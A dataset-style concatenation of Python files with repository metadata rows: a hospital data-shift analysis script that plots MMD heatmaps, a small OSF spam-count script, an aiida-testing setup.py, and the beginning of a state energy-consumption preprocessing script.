colorbar.set_ticks([0.25, 0.75])
colorbar.set_ticklabels(['No Data Shift', 'Data Shift'])
label_text = 'Hospital ID'
if use_group and group_type=='regions':
label_text = 'Region'
elif use_group and group_type=='beds':
label_text = 'Numbedscategory'
plt.xlabel(label_text) # Target
plt.ylabel(label_text) # Source
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_p_val_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
# cmap = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
if test_type == 'univ':
# hosp_pair_feat_pval = hosp_pair_feat_pval.min(axis=0) # Bonferroni correction by taking min across hospital pairs
# hosp_pair_feat_avg_pval = hosp_pair_feat_pval.mean(axis=1) < adjust_sign_level # mean across random runs
hosp_pair_feat_avg_pval = hosp_pair_feat_pval.mean(axis=0)
feature_set_escaped = [i.replace('_', '\_') for i in feature_set]
hosp_pair_feat_avg_pval = pd.DataFrame(hosp_pair_feat_avg_pval, index=feature_set_escaped)
hosp_pair_feat_avg_pval.columns=["Features"]
hosp_pair_feat_avg_pval.to_csv("%s/%s_%s_%s_%s_feat_avg_pval_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
plt.figure(figsize=(8, 6))
fig = sns.heatmap(hosp_pair_feat_avg_pval, linewidths=0.5, cmap=cmap, square=True)
plt.savefig("%s/%s_%s_%s_%s_feat_avg_pval_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
hosp_pair_feat_avg_tval = hosp_pair_feat_tval.mean(axis=0)
hosp_pair_feat_avg_tval = pd.DataFrame(hosp_pair_feat_avg_tval, index=feature_set_escaped)
hosp_pair_feat_avg_tval.columns=["Features"]
hosp_pair_feat_avg_tval.to_csv("%s/%s_%s_%s_%s_feat_avg_tval_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
plt.figure(figsize=(8, 6))
fig = sns.heatmap(hosp_pair_feat_avg_tval, linewidths=0.5, cmap=cmap, square=True)
plt.savefig("%s/%s_%s_%s_%s_feat_avg_tval_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
# Minimum of the pairwise average tval in subsets of 5 hospitals
MAX_NUM_SUBSET = 5
HospitalIDs_ = np.array(HospitalIDsColnames)
for num_subset in range(1, MAX_NUM_SUBSET+1):
avg_tval_subset = []
for subs in combinations(range(len(HospitalIDs_)), num_subset):
avg_tval_subset.append((subs, hosp_pair_tval[np.ix_(subs,subs)].mean()))
avg_tval_subset_sorted = sorted(avg_tval_subset, key=lambda x: x[1])
avg_tval_subset_sorted = [(HospitalIDs_[np.array(subs)],mmd) for subs,mmd in avg_tval_subset_sorted]
avg_tval_subset_sorted = pd.DataFrame(avg_tval_subset_sorted, columns=['HospitalIDs','average_MMD'])
avg_tval_subset_sorted.to_csv("%s/%s_%s_%s_%s_%s_t_val_min_subset.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, num_subset), index=False)
# MMD statistic value
hosp_avg_tval = hosp_pair_tval.mean(axis=1)
hosp_pair_tval_triu = np.triu(np.ones_like(hosp_pair_tval, dtype=np.bool))
np.fill_diagonal(hosp_pair_tval_triu, False)
hosp_pair_tval = pd.DataFrame(hosp_pair_tval, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_tval.to_csv("%s/%s_%s_%s_%s_t_val_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
# cmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
# fig = sns.heatmap(hosp_pair_tval, linewidths=0.5, cmap=cmap)
fig = sns.heatmap(hosp_pair_tval, mask=hosp_pair_tval_triu, linewidths=0.5, cmap=cmap)
label_text = 'Hospital ID'
if use_group and group_type=='regions':
label_text = 'Region'
elif use_group and group_type=='beds':
label_text = 'Numbedscategory'
plt.xlabel(label_text) # Target
plt.ylabel(label_text) # Source
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_t_val_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
hosp_all_pairs_tval = pd.melt(hosp_pair_tval.reset_index(), id_vars='index')
hosp_all_pairs_tval.columns = ['Source','Target','MMD']
if dr == DimensionalityReduction.NoRed.value: # TODO run auc smr plots only once in dr_techniques_plot
h_stats_all = hosp_all_pairs_tval
for metric_idx in range(NUM_METRICS):
if metric_names[metric_idx] in ['csdiff', 'cs', 'fnrsign', 'csdispsign', 'aucdispsign']:
cmap = sns.color_palette("vlag", as_cmap=True)
elif metric_names[metric_idx] in ['aucdiff', 'auc']:
cmap = sns.color_palette("rocket", as_cmap=True)
else:
cmap = sns.color_palette("rocket_r", as_cmap=True)
metric_name = metric_names[metric_idx].replace('_', '\_')
feats_shifts_samples_metric = samples_shifts_rands_feats_hosp_pairs_te_acc[si,shift_idx,:,feature_group_idx,:,:,metric_idx]
mean_te_metric = np.mean(feats_shifts_samples_metric, axis=0)
std_te_metric = np.std(feats_shifts_samples_metric, axis=0)
# hosp_avg_metric = mean_te_metric.mean(axis=1)
# hosp_min_metric = mean_te_metric.min(axis=1)
hosp_pair_metric = pd.DataFrame(mean_te_metric, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_metric.to_csv("%s/%s_%s_%s_%s_%s_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), index=True)
# cmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
center, vmin, vmax = None, None, None
if not use_group:
if metric_names[metric_idx] in ['csdisp', 'aucdisp', 'fnr']:
center, vmin, vmax = None, None, np.nanpercentile(mean_te_metric,97.5)
elif metric_names[metric_idx] in ['csdispsign', 'aucdispsign', 'fnrsign', 'fnrmin', 'fnrmaj']:
center, vmin, vmax = 0, np.nanpercentile(mean_te_metric,2.5), np.nanpercentile(mean_te_metric,97.5)
elif metric_names[metric_idx] in ['csmin', 'csmaj']:
center, vmin, vmax = 1, np.nanpercentile(mean_te_metric,2.5), np.nanpercentile(mean_te_metric,97.5)
fig = sns.heatmap(hosp_pair_metric, linewidths=0.5, cmap=cmap, center=center, vmin=vmin, vmax=vmax)
xlabel_text = 'Test Hospital ID'
ylabel_text = 'Train Hospital ID'
if use_group and group_type=='regions':
xlabel_text = 'Test Region'
ylabel_text = 'Train Region'
elif use_group and group_type in ['beds', 'regions_beds', 'regions_beds_teaching']:
xlabel_text = 'Test Category'
ylabel_text = 'Train Category'
plt.xlabel(xlabel_text)
plt.ylabel(ylabel_text)
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_%s_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), bbox_inches='tight')
plt.clf()
hosp_all_pairs_metric = pd.melt(hosp_pair_metric.reset_index(), id_vars='index')
hosp_all_pairs_metric.columns = ['Source','Target',metric_name]
h_stats_all = h_stats_all.merge(hosp_all_pairs_metric, how='left',
left_on=['Source','Target'], right_on = ['Source','Target'])
# plot only across hospital results
h_stats_all = h_stats_all[h_stats_all.Source!=h_stats_all.Target]
for metric_idx in range(NUM_METRICS):
metric_name = metric_names[metric_idx].replace('_', '\_')
fig = sns.regplot(data=h_stats_all, x='MMD', y=metric_name, scatter_kws={"s": 80, 'alpha':0.6}, truncate=False)
try:
corr_coef, pval_corr_coef = stats.pearsonr(h_stats_all['MMD'], h_stats_all[metric_name])
except ValueError as err:
print(feature_group, metric_name)
print(err)
corr_coef = 0.0
pval_corr_coef = 1.0
textstr = '\n'.join((
r'Pearson corr.=%.4f' % (corr_coef, ),
r'p-val=%.4f' % (pval_corr_coef, )))
# these are matplotlib.patch.Patch properties
props = dict(boxstyle='round', facecolor='white', alpha=0.5)
# place a text box in upper left in axes coords
fig.text(0.5, 0.95, textstr, transform=fig.transAxes, fontsize=14,
verticalalignment='top', bbox=props)
plt.xlabel('$MMD^2$')
plt.ylabel('Generalization gap in {}'.format(metric_name))
plt.savefig("%s/%s_%s_%s_%s_mmd_%s_scatter.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), bbox_inches='tight')
plt.clf()
h_stats_all.to_csv("%s/hstats_all_%s_%s_%s_%s_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
| 59.430407 | 269 | 0.646285 |
3c57f29eb95c40842b9781c30c39516ef8329161 | 1,285 | py | Python | scripts/remove_after_use/create_spam_node_count_csv.py | caseyrollins/osf.io | e42e566f303d09b54f4025517031b08f404592eb | [
"Apache-2.0"
] | 1 | 2019-12-23T04:30:20.000Z | 2019-12-23T04:30:20.000Z | scripts/remove_after_use/create_spam_node_count_csv.py | caseyrollins/osf.io | e42e566f303d09b54f4025517031b08f404592eb | [
"Apache-2.0"
] | null | null | null | scripts/remove_after_use/create_spam_node_count_csv.py | caseyrollins/osf.io | e42e566f303d09b54f4025517031b08f404592eb | [
"Apache-2.0"
] | null | null | null | import sys
import csv
import logging
import datetime
from website.app import setup_django
setup_django()
from osf.models import Node, SpamStatus
from django.db.models import Count
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
if __name__ == '__main__':
main()
| 32.125 | 173 | 0.721401 |
3c583e3a31b0df8d7782674e1b493230037e47ae | 780 | py | Python | setup.py | greschd/aiida-pytest-mock-codes | 0d104fbad481c6dd2e5a0725e65dc2208fb8058b | [
"MIT"
] | 2 | 2020-02-27T16:52:54.000Z | 2021-07-17T09:07:28.000Z | setup.py | greschd/aiida-pytest-mock-codes | 0d104fbad481c6dd2e5a0725e65dc2208fb8058b | [
"MIT"
] | 31 | 2020-02-27T10:51:27.000Z | 2022-03-04T11:24:26.000Z | setup.py | greschd/aiida-pytest-mock-codes | 0d104fbad481c6dd2e5a0725e65dc2208fb8058b | [
"MIT"
] | 5 | 2020-02-27T13:31:42.000Z | 2022-01-31T18:49:06.000Z | #!/usr/bin/env python
"""Set up aiida-testing package."""
import os
import warnings
import setuptools
from setuptools.config import read_configuration
# 'fastentrypoints' patches setuptools to emit faster console-script stubs;
# it is optional, so a missing install only degrades startup speed.
try:
    import fastentrypoints  # NOQA # pylint: disable=unused-import
except ImportError:
    warnings.warn(
        "The 'fastentrypoints' module could not be loaded. "
        "Installed console script will be slower."
    )
# Read the declarative package configuration from setup.cfg next to this file.
SETUP_CONFIG_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'setup.cfg')
SETUP_KWARGS = read_configuration(SETUP_CONFIG_PATH)
EXTRAS_REQUIRE = SETUP_KWARGS['options']['extras_require']
# The 'dev' extra is the union of the docs, testing and pre-commit extras.
EXTRAS_REQUIRE['dev'] = (
    EXTRAS_REQUIRE["docs"] + EXTRAS_REQUIRE["testing"] + EXTRAS_REQUIRE["pre_commit"]
)
if __name__ == "__main__":
    setuptools.setup(extras_require=EXTRAS_REQUIRE)
| 30 | 89 | 0.744872 |
3c595afdb533a0fc9550d6782a8298265522f096 | 8,299 | py | Python | inference.py | biswaroop1547/Neural_Fashion_Caption_Creator | 35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e | [
"MIT"
] | 3 | 2021-04-12T02:23:18.000Z | 2022-01-06T12:05:24.000Z | inference.py | biswaroop1547/Neural_Fashion_Caption_Creator | 35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e | [
"MIT"
] | null | null | null | inference.py | biswaroop1547/Neural_Fashion_Caption_Creator | 35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e | [
"MIT"
] | null | null | null | import os
import time
import h5py
import json
from PIL import Image
import torch
from torch import nn
import torchvision
import torchvision.transforms as transforms
import torch.optim
import torch.nn.functional as F
from torch.utils.data.dataset import random_split
from torch.utils.data import Dataset
from torch.nn.utils.rnn import pack_padded_sequence
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.utils import class_weight
from tqdm.notebook import tqdm
import matplotlib.cm as cm
import torch.backends.cudnn as cudnn
import torch.utils.data
import skimage.transform
from scipy.misc import imread, imresize
device = torch.device("cpu")
def caption_image(encoder, decoder, image_path, word_map, beam_size=3):
"""
Reads an image and captions it with beam search.
Input:
:param encoder: encoder model
:param decoder: decoder model
:param image_path: path to image
:param word_map: word map(word to index mapping)
:param beam_size: number of sequences to consider at each decode-step
Output:
:return: caption, weights for visualization
"""
k = beam_size
vocab_size = len(word_map)
## Read image and process
img = imread(image_path)
if len(img.shape) == 2:
img = img[:, :, np.newaxis]
img = np.concatenate([img, img, img], axis=2)
img = imresize(img, (256, 256))
img = img.transpose(2, 0, 1)
img = img / 255.
img = torch.FloatTensor(img).to(device)
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transform = transforms.Compose([normalize])
image = transform(img) # (3, 256, 256)
# Encode
# (1, 3, 256, 256)
image = image.unsqueeze(0)
#(1, enc_image_size, enc_image_size, encoder_dim)
#(1, 14, 14, 2048)
encoder_out = encoder(image)
enc_image_size = encoder_out.size(1)
encoder_dim = encoder_out.size(3)
# Flatten encoding
# (1, num_pixels, encoder_dim)
# (1, 196, 2048)
encoder_out = encoder_out.view(1, -1, encoder_dim)
num_pixels = encoder_out.size(1)
# We'll treat the problem as having a batch size of k
# (k, num_pixels, encoder_dim)
encoder_out = encoder_out.expand(k, num_pixels, encoder_dim)
# Tensor to store top k previous words at each step; now they're just <start>
k_prev_words = torch.LongTensor([[word_map['<start>']]] * k).to(device) # (k, 1)
# Tensor to store top k sequences; now they're just <start>
# (k, 1)
seqs = k_prev_words
# Tensor to store top k sequences scores; now they're just 0
top_k_scores = torch.zeros(k, 1).to(device) # (k, 1)
# Tensor to store top k sequences alphas; now they're just 1s
# (k, 1, enc_image_size, enc_image_size)
seqs_alpha = torch.ones(k, 1, enc_image_size, enc_image_size).to(device)
# Lists to store completed sequences, their alphas and scores
complete_seqs = list()
complete_seqs_alpha = list()
complete_seqs_scores = list()
# Start decoding
step = 1
h, c = decoder.init_hidden_state(encoder_out)
# s is a number less than or equal to k,
# because sequences are removed from this process once they hit <end>
while True:
# (s, embed_dim)
embeddings = decoder.embedding(k_prev_words).squeeze(1)
# (s, encoder_dim), (s, num_pixels)
awe, alpha = decoder.attention(encoder_out, h)
# (s, enc_image_size, enc_image_size)
alpha = alpha.view(-1, enc_image_size, enc_image_size)
# gating scalar, (s, encoder_dim)
gate = decoder.sigmoid(decoder.f_beta(h))
awe = gate * awe
# (s, decoder_dim)
h, c = decoder.decode_step(torch.cat([embeddings, awe], dim=1), (h, c))
# (s, vocab_size)
scores = decoder.fc(h)
scores = F.log_softmax(scores, dim=1)
# Add
scores = top_k_scores.expand_as(scores) + scores # (s, vocab_size)
# For the first step, all k points will have the same scores (since same k previous words, h, c)
if step == 1:
top_k_scores, top_k_words = scores[0].topk(k, 0, True, True) # (s)
else:
# Unroll and find top scores, and their unrolled indices
top_k_scores, top_k_words = scores.view(-1).topk(k, 0, True, True) # (s)
# print(top_k_words)
# Convert unrolled indices to actual indices of scores
prev_word_inds = top_k_words // vocab_size # (s)
next_word_inds = top_k_words % vocab_size # (s)
# print(seqs[prev_word_inds])
# Add new words to sequences, alphas
seqs = torch.cat([seqs[prev_word_inds], next_word_inds.unsqueeze(1)], dim=1) # (s, step+1)
seqs_alpha = torch.cat([seqs_alpha[prev_word_inds], alpha[prev_word_inds].unsqueeze(1)],
dim=1) # (s, step+1, enc_image_size, enc_image_size)
# Which sequences are incomplete (didn't reach <end>)?
incomplete_inds = [ind for ind, next_word in enumerate(next_word_inds) if
next_word != word_map['<end>']]
## will be empty if none of them have reached <end>
complete_inds = list(set(range(len(next_word_inds))) - set(incomplete_inds))
# Set aside complete sequences
if len(complete_inds) > 0:
complete_seqs.extend(seqs[complete_inds].tolist())
complete_seqs_alpha.extend(seqs_alpha[complete_inds].tolist())
complete_seqs_scores.extend(top_k_scores[complete_inds])
k -= len(complete_inds) # reduce beam length accordingly
# Proceed with incomplete sequences
if k == 0:
break
seqs = seqs[incomplete_inds]
seqs_alpha = seqs_alpha[incomplete_inds]
### updating h's and c's for incomplete sequences
h = h[prev_word_inds[incomplete_inds]]
c = c[prev_word_inds[incomplete_inds]]
encoder_out = encoder_out[prev_word_inds[incomplete_inds]]
top_k_scores = top_k_scores[incomplete_inds].unsqueeze(1)
k_prev_words = next_word_inds[incomplete_inds].unsqueeze(1)
# Break if things have been going on too long
if step > 40:
break
step += 1
# print(complete_seqs)
i = complete_seqs_scores.index(max(complete_seqs_scores))
seq = complete_seqs[i]
alphas = complete_seqs_alpha[i]
return seq, alphas
# def visualize_att(image_path, seq, alphas, rev_word_map, smooth=False):
# """
# Visualizes caption with weights at every word.
# Adapted from paper authors' repo: https://github.com/kelvinxu/arctic-captions/blob/master/alpha_visualization.ipynb
# :param image_path: path to image
# :param seq: generated caption
# :param alphas: attention weights for every time steps
# :param rev_word_map: reverse word mapping, i.e. ix2word
# :param smooth: smooth weights?
# """
# image = Image.open(image_path)
# image = image.resize([14 * 14, 14 * 14], Image.LANCZOS)
# words = [rev_word_map[ind] for ind in seq]
# figures = []
# for t in range(len(words)):
# fig = plt.figure()
# if t > 50:
# break
# #plt.subplot(np.ceil(len(words) / 5.), 5, t + 1)
# fig.text(0, 1, '%s' % (words[t]), color='black', backgroundcolor='white', fontsize=12)
# plt.imshow(image)
# current_alpha = alphas[t, :]
# if smooth:
# alpha = skimage.transform.pyramid_expand(current_alpha.numpy(), upscale=14, sigma=8)
# else:
# alpha = skimage.transform.resize(current_alpha.numpy(), [14 * 14, 14 * 14])
# if t == 0:
# plt.imshow(alpha, alpha=0)
# else:
# plt.imshow(alpha, alpha=0.8)
# plt.set_cmap(cm.Greys_r)
# plt.axis('off')
# figures.append(fig)
# #plt.savefig("horse_riding/"+words[t]+ str(t)+'.png', bbox_inches = 'tight', pad_inches = 0)
# plt.show()
| 32.291829 | 121 | 0.616821 |
3c599676a9ae26a258559d911189a12f55452ddf | 666 | py | Python | src/yellowdog_client/model/internal_user.py | yellowdog/yellowdog-sdk-python-public | da69a7d6e45c92933e34fefcaef8b5d98dcd6036 | [
"Apache-2.0"
] | null | null | null | src/yellowdog_client/model/internal_user.py | yellowdog/yellowdog-sdk-python-public | da69a7d6e45c92933e34fefcaef8b5d98dcd6036 | [
"Apache-2.0"
] | null | null | null | src/yellowdog_client/model/internal_user.py | yellowdog/yellowdog-sdk-python-public | da69a7d6e45c92933e34fefcaef8b5d98dcd6036 | [
"Apache-2.0"
] | null | null | null | from dataclasses import dataclass, field
from typing import List, Optional
from .access_delegate import AccessDelegate
from .password_state import PasswordState
from .user import User
| 33.3 | 85 | 0.753754 |
3c59b7068b704fe1f1c47ee7e6a0b30a676e031e | 6,891 | py | Python | sdk/python/pulumi_aws/dms/replication_task.py | pulumi-bot/pulumi-aws | 756c60135851e015232043c8206567101b8ebd85 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/dms/replication_task.py | pulumi-bot/pulumi-aws | 756c60135851e015232043c8206567101b8ebd85 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/dms/replication_task.py | pulumi-bot/pulumi-aws | 756c60135851e015232043c8206567101b8ebd85 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
| 49.57554 | 288 | 0.689015 |
3c5b0b5866a106b628ab68aee24923fb36a181b9 | 8,674 | py | Python | pymap/interfaces/message.py | BoniLindsley/pymap | b3190d20799a6d342888e51bfc55cdfcbfe3ed26 | [
"MIT"
] | 18 | 2015-06-04T21:09:37.000Z | 2022-03-04T08:14:31.000Z | pymap/interfaces/message.py | BoniLindsley/pymap | b3190d20799a6d342888e51bfc55cdfcbfe3ed26 | [
"MIT"
] | 114 | 2018-10-17T23:11:00.000Z | 2022-03-19T16:59:16.000Z | pymap/interfaces/message.py | BoniLindsley/pymap | b3190d20799a6d342888e51bfc55cdfcbfe3ed26 | [
"MIT"
] | 8 | 2015-02-03T19:30:52.000Z | 2021-11-20T12:47:03.000Z |
from __future__ import annotations
from abc import abstractmethod
from collections.abc import Collection, Sequence
from datetime import datetime
from typing import TypeVar, Protocol
from ..bytes import Writeable
from ..flags import SessionFlags
from ..parsing.response.fetch import EnvelopeStructure, BodyStructure
from ..parsing.specials import Flag, ObjectId, FetchRequirement
__all__ = ['MessageT', 'MessageT_co', 'FlagsKey', 'CachedMessage',
'MessageInterface', 'LoadedMessageInterface']
#: Type variable with an upper bound of :class:`MessageInterface`.
MessageT = TypeVar('MessageT', bound='MessageInterface')
#: Covariant type variable with an upper bound of :class:`MessageInterface`.
MessageT_co = TypeVar('MessageT_co', bound='MessageInterface', covariant=True)
#: Type alias for the value used as a key in set comparisons detecting flag
#: updates.
FlagsKey = tuple[int, frozenset[Flag]]
| 28.071197 | 79 | 0.613212 |
3c5b1d85968d78e7d6653a282357a7d53ef86e80 | 623 | py | Python | auxiliary-scripts/LRC-to-Label.py | xbnstudios/show-scripts | fb2eb5bb41eadc9757567fb6b1217d6c2bad0620 | [
"Unlicense"
] | 1 | 2018-03-08T16:00:31.000Z | 2018-03-08T16:00:31.000Z | auxiliary-scripts/LRC-to-Label.py | ManualManul/XBN | fb2eb5bb41eadc9757567fb6b1217d6c2bad0620 | [
"Unlicense"
] | null | null | null | auxiliary-scripts/LRC-to-Label.py | ManualManul/XBN | fb2eb5bb41eadc9757567fb6b1217d6c2bad0620 | [
"Unlicense"
] | null | null | null | import glob
for file in glob.glob("*.lrc"):
filename = file[0:7] # assume fnt-xxx.lrc file format
lrc_file = open(file, encoding="utf-8")
lrc_lines = lrc_file.readlines()
lrc_file.close()
label = open(filename + '.txt', 'w', encoding="utf-8")
print(filename)
for line in lrc_lines[3:]:
time = line[line.find("[")+1:line.find("]")].replace('.', ':').split(':')
labeltime = str(int(time[0]) * 60 + int(time[1])) + '.' + time[2] + '0000'
title = line.split(']',1)[1].rstrip('\n')
label.write(labeltime + ' ' + labeltime + ' ' + title + '\n')
label.close()
| 31.15 | 82 | 0.552167 |
3c5b46fd9008363f42f8cbdbddac0fafdcddf679 | 2,750 | py | Python | driving/boost_grab.py | Chadc265/DingusBot | 98a05fe6ef75e2b48038f9fbbfacc204e89d0d86 | [
"MIT"
] | null | null | null | driving/boost_grab.py | Chadc265/DingusBot | 98a05fe6ef75e2b48038f9fbbfacc204e89d0d86 | [
"MIT"
] | null | null | null | driving/boost_grab.py | Chadc265/DingusBot | 98a05fe6ef75e2b48038f9fbbfacc204e89d0d86 | [
"MIT"
] | null | null | null | import math
from rlbot.agents.base_agent import SimpleControllerState
from rlbot.utils.structures.game_data_struct import GameTickPacket
from driving.drive import drive_to_target
from base.action import Action
from base.car import Car
from base.ball import Ball
from util.vec import Vec3
from util.boost import BoostTracker, Boost | 42.96875 | 136 | 0.623636 |
3c5bb249ee0abe83ae7713176bfcb5fd594b89eb | 2,026 | py | Python | texteditor.py | bkenza/text-editor | 595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad | [
"MIT"
] | null | null | null | texteditor.py | bkenza/text-editor | 595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad | [
"MIT"
] | null | null | null | texteditor.py | bkenza/text-editor | 595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad | [
"MIT"
] | null | null | null | import sys
from tkinter import *
from tkinter import filedialog
####################
# FUNCTIONS #
####################
#########################
# TEXT EDITOR
#########################
# Create text editor
# NOTE(review): the callbacks wired below (saveas, darktheme, lighttheme,
# FontCourier, FontHelvetica, FontArial, FontTimes) are not defined in this
# excerpt -- presumably they live in the stripped FUNCTIONS section above;
# confirm against the full source before running.
# NOTE(review): Tk()'s first positional parameter is screenName (an X
# display), not a window title -- a title was presumably intended; verify.
text_editor = Tk("Kenza's text editor")
# Add text widget
text = Text(text_editor)
text.grid()
# Add save button
button = Button(text_editor, text="Save", command=saveas)
button.grid(row=1, column=1)
# Dark mode
# NOTE(review): `theme` is rebound by the "Light" button below, so only the
# last Button stays referenced; both widgets still render via grid().
theme = Button(text_editor, text="Dark", command=darktheme)
theme.grid(row=1, column=2)
# Light mode
theme = Button(text_editor, text="Light", command=lighttheme)
theme.grid(row=1, column=3)
# Add font menu
font = Menubutton(text_editor, text="Font")
font.grid(row=1, column=4)
font.menu = Menu(font, tearoff=0)
font["menu"] = font.menu
# One checkbox state variable (IntVar) per selectable font.
Helvetica = IntVar()
Arial = IntVar()
Times = IntVar()
Courier = IntVar()
font.menu.add_checkbutton(label="Courier", variable=Courier,
                          command=FontCourier)
font.menu.add_checkbutton(label="Helvetica", variable=Helvetica,
                          command=FontHelvetica)
font.menu.add_checkbutton(label="Arial", variable=Arial,
                          command=FontArial)
font.menu.add_checkbutton(label="Times", variable=Times,
                          command=FontTimes)
# Enter the Tk event loop; blocks until the window is closed.
text_editor.mainloop()
| 20.886598 | 64 | 0.633268 |
3c5cbe5565f6ab8319a2c93389c8a977b851666a | 525 | py | Python | api/models/__init__.py | NathanBMcNamara/Speculator | e74aff778d6657a8c4993c62f264008c9be99e78 | [
"MIT"
] | 106 | 2017-11-09T13:58:45.000Z | 2021-12-20T03:11:19.000Z | api/models/__init__.py | NathanBMcNamara/Speculator | e74aff778d6657a8c4993c62f264008c9be99e78 | [
"MIT"
] | 6 | 2017-10-30T13:29:49.000Z | 2021-09-13T12:06:59.000Z | api/models/__init__.py | NathanBMcNamara/Speculator | e74aff778d6657a8c4993c62f264008c9be99e78 | [
"MIT"
] | 39 | 2017-10-30T16:35:01.000Z | 2021-10-31T10:32:48.000Z | """ Default import all .py files in current directory """
from glob import iglob
from re import search

__all__ = []

# Find all DB model modules under a models/ directory and export their
# module names via __all__ so `from package import *` pulls them in.
_MODEL_PATTERN = r'.*/models/\w+\.py'  # hoisted: loop-invariant
_SUFFIX = '.py'
for path in iglob('./**/*.py', recursive=True):
    if search(_MODEL_PATTERN, path) is not None:
        # The module file is the last component of the path.
        filename = path.split('/')[-1]
        # BUG FIX: the original used filename.rstrip('.py'), but rstrip()
        # strips a *character set*, not a suffix (e.g. 'happy.py' -> 'ha').
        # Slicing the extension off is exact.
        module = filename[:-len(_SUFFIX)]
        if module != '__init__':
            __all__.append(module)
| 32.8125 | 59 | 0.617143 |
3c5cc632bb94b5ef7ccfb33dc669053fbfcfe760 | 1,374 | py | Python | Software/localization_sims/mlat.py | ncsurobotics/acoustics-sw8 | f2ab37416f7235c1d3681e5e2e237c26da276ed6 | [
"MIT"
] | null | null | null | Software/localization_sims/mlat.py | ncsurobotics/acoustics-sw8 | f2ab37416f7235c1d3681e5e2e237c26da276ed6 | [
"MIT"
] | null | null | null | Software/localization_sims/mlat.py | ncsurobotics/acoustics-sw8 | f2ab37416f7235c1d3681e5e2e237c26da276ed6 | [
"MIT"
] | null | null | null | from tdoa_sim import TDOASim
import numpy as np
| 37.135135 | 129 | 0.532751 |
3c5dbe6d61fbd8cfdc1de683ac736616ff35e009 | 2,811 | py | Python | code/preprocess/consumption/sector/tn/tn_tx.py | Spacebody/MCM-ICM-2018-Problem-C | 89acbec8b7b08733002e570ff67637e7ba100190 | [
"MIT"
] | 1 | 2021-09-18T08:01:19.000Z | 2021-09-18T08:01:19.000Z | code/preprocess/consumption/sector/tn/tn_tx.py | Spacebody/MCM-ICM-2018-Problem-C | 89acbec8b7b08733002e570ff67637e7ba100190 | [
"MIT"
] | null | null | null | code/preprocess/consumption/sector/tn/tn_tx.py | Spacebody/MCM-ICM-2018-Problem-C | 89acbec8b7b08733002e570ff67637e7ba100190 | [
"MIT"
] | 1 | 2018-05-13T08:39:46.000Z | 2018-05-13T08:39:46.000Z | #! usr/bin/python3
import pandas as pd
import re
import numpy as np
import os
import sys
from collections import OrderedDict, defaultdict
import matplotlib as mpl
import matplotlib.pyplot as plt
# import seaborn as sns
from scipy import stats, integrate
# sns.set() # switch to seaborn default
# sns.set_style("whitegrid")
#load sector msncodes
tn_msncodes = pd.read_csv("data/csv/consumption/sector/tn_sector.csv", engine='c', low_memory=True)["MSN"]
#load state data
tx_data = pd.read_csv("data/csv/state_data/tx_data.csv", engine='c', low_memory=True)
tx_msn = []
tx_year = []
tx_value = []
for i in range(len(tx_data["MSN"])):
for j in range(len(tn_msncodes)):
if tx_data["MSN"][i] == tn_msncodes[j]:
tx_msn.append(tx_data["MSN"][i])
tx_year.append(tx_data["Year"][i])
tx_value.append(tx_data["Data"][i])
else:
pass
tx_tn = OrderedDict()
tx_tn["MSN"] = tx_msn
tx_tn["Year"] = tx_year
tx_tn["Data"] = tx_value
tx_tn_data = pd.DataFrame(tx_tn)
tx_tn_data.to_csv("data/csv/consumption/sector/tx/tx_tn_data.csv",
index=False, index_label=False, sep=',')
# print(tx_tn_data)
sectors = ["TNACB", "TNCCB", "TNICB", "TNRCB"]
tnacb = OrderedDict()
tnacb["Year"] = []
tnacb["Data"] = []
tnccb = OrderedDict()
tnccb["Year"] = []
tnccb["Data"] = []
tnicb = OrderedDict()
tnicb["Year"] = []
tnicb["Data"] = []
tnrcb = OrderedDict()
tnrcb["Year"] = []
tnrcb["Data"] = []
for i in range(len(tx_tn_data["MSN"])):
if tx_tn_data["MSN"][i] == "TNACB":
